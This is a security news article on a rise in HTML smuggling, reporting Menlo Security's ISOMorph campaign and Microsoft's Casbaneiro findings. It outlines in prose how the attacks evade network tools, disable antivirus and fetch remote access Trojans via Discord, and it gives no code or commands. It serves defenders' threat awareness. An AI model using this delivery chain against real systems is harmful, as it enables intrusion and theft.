Reports Point to Uptick in HTML Smuggling Attacks

Menlo Security and Microsoft report recent campaigns implementing the technique, which helps attackers stealthily deliver malware.

HTML smuggling may not be a new technique, but it is generating new attention as a threat to watch in reports of recent attack campaigns that use the method to stealthily deliver malware.
The tactic helps attackers bypass network security tools by using the features in HTML5 and JavaScript code to deliver file downloads. Most tools monitor the data coming in and out of the network and flag suspicious code based on patterns or signatures. With HTML smuggling, the payload is constructed within the browser on a target device, so it often slips past unnoticed.
HTML smuggling doesnt exploit a vulnerability or design flaw in the browser. Attackers might include a link in an email that, when clicked, redirects to an HTML page that uses HTML and JavaScript code to compile the payload within the browser. Alternatively, they may send an HTML attachment along with a message convincing the victim to download and open it.
An attack could start with a phishing email or Web browsing, says Vinay Pidathala, director of security research at Menlo Security, where the team has been tracking an HTML smuggling campaign called ISOMorph.
In this campaign, once a victim clicks a malicious link or downloads an attachment, the first-stage payload is an ISO file — a file type often preferred by attackers because it doesnt require any third-party software to install, Menlo Security researchers note in a blog post. This ISO file contains a malicious script that, once executed, fetches additional PowerShell scripts. Researchers identified several different malicious scripts being used in this campaign.
After they click the link, everything is constructed on the browser itself, Pidathala says.
The malicious PowerShell script checks for, and disables, antivirus systems. It also downloads additional payloads from Discord, which attackers used to host malicious payloads for this campaign. Pidathala says this is noteworthy, as the chat platform reportedly has over 150 million active users who use it to communicate via text and voice messages.
ISOMorphs final payload is a remote access Trojan (RAT) called AsyncRAT/NJRAT, which has been used by many attackers in the past but predominantly used to compromise high-value targets in the Middle East, researchers report. The team is still analyzing this attack activity and cannot share details about the targets or who the attackers are.
The ISOMorph campaign isnt the only one in recent years to make use of HTML smuggling. Last summer, Menlo Securitys team identified
another campaign
, called Duri, which similarly leveraged the technique to deliver malware.
Microsofts security team has also recently reported attackers are increasingly using HTML smuggling, in phishing and other email campaigns, to deliver threats. In a campaign the team has been tracking for weeks, attackers send emails with malicious links that, when licked, drop components embedded in an HTML page via HTML smuggling.
This ultimately leads to dropping a ZIP archive containing a JavaScript file on a target machine, Microsoft Security Intelligence wrote in a
Twitter thread
. The JavaScript file connects to a malicious website to download another ZIP file with a .PNG file extension; this contains two dynamic link libraries (DLLs) and one executable file. One of the DLLs is the final payload: a banking Trojan named Casbaneiro, which is loaded using DLL sideloading, researchers report.
A Growing Threat
In the
blog post on their findings
, Menlo Security researchers say the re-emergence of HTML smuggling could be linked to the global increase in remote work. Because it helps attackers bypass sandboxes, legacy proxies, and firewalls, the method could appeal to attackers seeking to target people who spend many hours working remotely using browser-based applications.
The most crucial aspect is the evasion aspect, says Pidathala. A typical enterprise has X number of network security appliances, and half the battle for the attacker is done when theyre able to get their payload onto the endpoint … using HTML smuggling, theyre able to do half of what they need to successfully compromise the endpoint.
The use of HTML smuggling among high-profile attack groups could also be driving the increase. Nobelium, the group behind last years SolarWinds supply chain attack, also used the tactic, Microsoft reports in a
breakdown
of the groups techniques.
Attackers use of Discord in the ISOMorph campaign should be a sign for organizations to take a closer look at the cloud applications they use, Pidathala adds. This isnt the first attack campaign to use Discord; however, its interesting to see both the chat app and HTML smuggling used together to evade detection.
Its super important that enterprises understand their cloud application posture, Pidathala says, noting they should understand what cloud applications are needed for their business and what are needed, and then outright block such kind of cloud applications.
The use of legitimate applications in cybercrime makes it even easier for these attacks to fly under the radar. Pidathala adds: Its getting extremely difficult for security practitioners to identify whats good and whats bad.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Reports Point to Uptick in HTML Smuggling Attacks